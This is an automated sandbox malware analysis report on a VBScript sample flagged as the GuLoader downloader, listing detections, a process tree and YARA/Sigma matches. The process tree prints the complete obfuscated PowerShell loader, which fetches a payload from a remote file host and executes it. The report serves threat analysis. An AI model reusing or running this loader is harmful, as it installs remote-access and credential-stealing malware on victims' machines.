Windows Analysis Report
update.vbs

Overview

General Information

Sample name: update.vbs
Analysis ID: 1446633
MD5: 7bc04c5410cd2c7395ba82859240fea6
SHA1: 014f8e77cdedd5141c80a316fc91741efdca8586
SHA256: 3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
Tags: vbs

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5008 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt 
trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. 
HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. 
Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. 
sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2260 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2624 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt 
trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. 
HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. 
Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. 
sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3292 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5964 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 1988 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Source | Rule | Description | Author | Strings
amsi64_1988.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_1988.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0x10150:$b2: ::FromBase64String(
              • 0xd4df:$s1: -join
              • 0x12fa6:$s3: Reverse
              • 0x6c8b:$s4: +=
              • 0x6d4d:$s4: +=
              • 0xaf74:$s4: +=
              • 0xd091:$s4: +=
              • 0xd37b:$s4: +=
              • 0xd4c1:$s4: +=
              • 0xf70c:$s4: +=
              • 0xf78c:$s4: +=
              • 0xf852:$s4: +=
              • 0xf8d2:$s4: +=
              • 0xfaa8:$s4: +=
              • 0xfb2c:$s4: +=
              • 0xdbf5:$e4: Get-WmiObject
              • 0xdde4:$e4: Get-Process
              • 0xde3c:$e4: Start-Process
amsi32_2624.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0x100a3:$b2: ::FromBase64String(
              • 0xd4df:$s1: -join
              • 0x12ef9:$s3: Reverse
              • 0x6c8b:$s4: +=
              • 0x6d4d:$s4: +=
              • 0xaf74:$s4: +=
              • 0xd091:$s4: +=
              • 0xd37b:$s4: +=
              • 0xd4c1:$s4: +=
              • 0xf70c:$s4: +=
              • 0xf78c:$s4: +=
              • 0xf852:$s4: +=
              • 0xf8d2:$s4: +=
              • 0xfaa8:$s4: +=
              • 0xfb2c:$s4: +=
              • 0xdbf5:$e4: Get-WmiObject
              • 0xdde4:$e4: Get-Process
              • 0xde3c:$e4: Start-Process
              • 0x17970:$e4: Get-Process

              System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", ProcessId: 5008, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", ProcessId: 5008, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour 
